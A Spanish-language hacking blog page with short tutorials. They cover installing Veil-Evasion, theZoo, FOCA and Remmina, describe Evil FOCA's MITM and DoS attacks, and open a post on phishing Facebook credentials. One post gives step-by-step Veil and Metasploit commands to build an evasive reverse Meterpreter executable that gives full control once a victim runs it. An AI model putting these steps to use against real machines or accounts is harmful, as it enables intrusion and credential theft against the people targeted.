Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

lunes, 15 de febrero de 2016

Obtener Credenciales de una cuenta de facebook

2/15/2016 12:42:00 a. m. Posted by Secpronet , , , , , , No hay comentarios
                           Obtener Credenciales de una cuenta de facebook 


Todo el mundo se queja de que les han hackeado su cuenta de Facebook y quieren recuperarla. Hoy en dia, esto se ha convertido en un problema bastante grande debido a la falta de conocimiento sobre como funcionan las cosas

Esta vez les enseñare a obtener las credenciales de un persona en facebook, el método es phishing. 

así que que comencemos:



sábado, 23 de enero de 2016

Instalar TheZoo en Kali Linux 2.0

THE ZOO



ACERCA DE

El propósito del Zoo es permitir el estudio de malware y permitir a las personas que están interesadas en el análisis de malware o incluso como parte de su trabajo para tener acceso a el mismo, analizar las formas en que operan y tal vez incluso permitir a las personas de avanzada y con experiencia para bloquear malwares específicos dentro de su propio entorno.

CUIDADO !!!

Recuerde que estos son programas maliciosos y peligroso Vienen cifrado y bloqueado por una razón!!!  NO ejecutarlos a menos que esté absolutamente seguro de lo que está haciendo! Son para ser utilizado sólo con fines educativos.

Se recomienda que se ejecuta en una máquina virtual que no tiene conexión a Internet (o una red virtual interna si es necesario) y sin adiciones de huéspedes o cualquier equivalente. Algunos de ellos son gusanos y tratarán de forma automática para extenderse.


COMO SE INSTALA
Descargamos los archivos acá les dejo el link 
luego lo descomprimimos 

unzip  theZoo-master.zip

Entramamos a la carpeta en mi caso la ruta sería 

cd /Descargas/theZoo-master
luego de esto damos permisos al archivo theZoo.py de la siguiente forma  

chmod 777 theZoo.py

y por ultimo lo ejecutamos y nos queda así.

./theZoo.py





Video 







lunes, 18 de enero de 2016

INSTALAR VEIL EVASION EN KALI LINUX 2.0

INSTALAR VEIL EVASION EN KALI LINUX 2.0 


Te enseñare de una forma raída y sencilla como instalar esta poderosa herramienta, comencemos 


actualizamos los repositorios con este comando 

 apt-get update

luego procedemos a instalar veil con el siguiente comando 

apt-get install veil

si de esta forma no nos deja instalarlo lo clonamos de la siguiente forma 

git clone https://github.com/Veil-Framework/Veil-Evasion

luego de esto procedemos a ejecutar el setup.sh de la siguiente forma en mi caso la ruta es la siguiente
.
cd /root/Veil-Evasion/setup/setup.sh

pedirá que instalemos python, pywin, pycrypto lo cual aremos lo típico siguiente siguiente e instalar. 

Esperaremos a que termine de instalar y aremos los siguiente. ejecutamos veil de la siguiente forma, tenemos que estar en el directorio o la carpeta de veil. 

./veil-evasion.py

y por ultimo tendremos esto:



espero que te sea útil este post.






viernes, 15 de enero de 2016

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instalado Veil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasion luego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria /var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO " 




martes, 5 de enero de 2016

Conectar Cliente Remmina RDP con Windows

Conectar Cliente Remmina RDP con Windows 


Hola compañeros en esta ocasión les enseñare como usar Remina, bueno si no lo tienen instalado en mi canal de youtube esta el tutorial de como instalarlo, comencemos.

lo primero que tenemos que hacer es que windows permita conexiones remotas, lo hacemos de la siguiente forma.  

para que tengamos acceso lo configuramos a como esta la imagen. 

luego procedemos desde Linux. 

Abrimos Remmina, vamos a la opción "Nuevo" 

Luego configuraremos las siguientes opciones:

Nombre  se le puede colocar cualquier nombre
Protocolo RDP 
Servidor  es la dirección ip de la maquina que queremos conectar
Nombre de Usuario  el con el que inicias sesión en la maquina
Contraseña  es el pass del usuario 


Luego de configurar estas opciones guardamos y nos quedara de la siguiente forma.


Luego clic derecho y conectar o doble clic y esperamos a que conecte.



al momento que conecte tendremos iniciada la sesión


Espero que te allá sido útil esta información..





jueves, 31 de diciembre de 2015

Instalar Remmina en Kli Linux 2.0

Remmina 


¿Que es?
Es un gran programa de escritorio remoto de cliente, para Linux.



Soporta los Siguientes Protocolos:
  • RDP
  • VNC 
  • SSH
  • NX
  • XDMCP
Con este software no nos limitamos a conectarnos a otros sistemas operativos. que sean compatibles con  el estándar del protocolo.

¿Como instalarlo?




"REMMINA"



  

lunes, 28 de diciembre de 2015

Que es y como usar Advanced IP Scanner

Que es Advanced IP Scanner
Este Grandioso explorador de redes rápido y de sencillo uso permite obtener información de la red y acceder a varios recursos como: carpetas compartidas, http, ftp, y más.
El programa requiere instalación y/o se ejecuta, cuenta con una interfaz simple, es muy popular entre los administradores de sistemas y usuarios particulares para la gestión y el control de redes. 





COMO USARLO 




"ADVANCE IP SCANNER"


sábado, 26 de diciembre de 2015

Instalar Foca en Kali Linux 2.0

Foca en Kali Linux 2.0



Que tal amigos espero que hayan pasado una buena navidad.

Muchos me han preguntado como ejecutar Foca en kali linux, bueno en esta ocasión les enseñare, así que comencemos.

Lo primero que aremos es instalar wine por si no lo tiene es con el siguiente comando: apt-get install wine


luego descargar foca.




Luego es entrar a la terminal y ejecutar este comando. wget http://www.kegel.com/wine/winetricks  esperan que descargue, con esto instalaremos programas de windows.



Lo siguiente es ejecutar este comando sh winetricks gdiplus fontfix dotnet20 que esos son los tres programas que instalaremos para poder ejecutar foca.




Luego descargar los dll que usa foca en windows y copiarlos a la carpeta plguins de foca.




Y luego clck derecho y ejecutar con wine o a wine application y listo 




"JUGANDO CON FOCA"

miércoles, 23 de diciembre de 2015

Ataque Dos Ipv6 con Evil Foca

Ataque Dos Ipv6 con Evil Foca



Que tal amigos en esta ocasión les enseñare una ataque Dos Ipv6 con evil foca ya que en el tutorial anterior se realizo con ipv4.

Sin mas que esperar acá les dejo el tutorial:

Link de Descarga aquí
o en la descripción del video





"El Bello Arte del Hacking Ético"

sábado, 19 de diciembre de 2015

Que es Evil Foca y Como usarlo (Ejemplo)

EVIL FOCA
Evil Foca es una herramienta para pentesters y auditores de seguridad que tiene como finalidad poner a prueba la seguridad en redes de datos IPv4 / IPv6. 
Esta poderosa herramienta puede realizar ataques como:
  • MITM sobre redes IPv4 con ARP Spoofing y DHCP ACK Injection.
  • MITM sobre redes IPv6 con Neighbor Advertisement Spoofing, Ataque SLAAC, fake DHCPv6.
  • DoS (Denegación de Servicio) sobre redes IPv4 con ARP Spoofing.
  • DoS (Denegación de Servicio) sobre redes IPv6 con SLAAC DoS.
  • DNS Hijacking.


Como Realizar un ataque Dos ipv4 






"NO TODO ES SEGURO"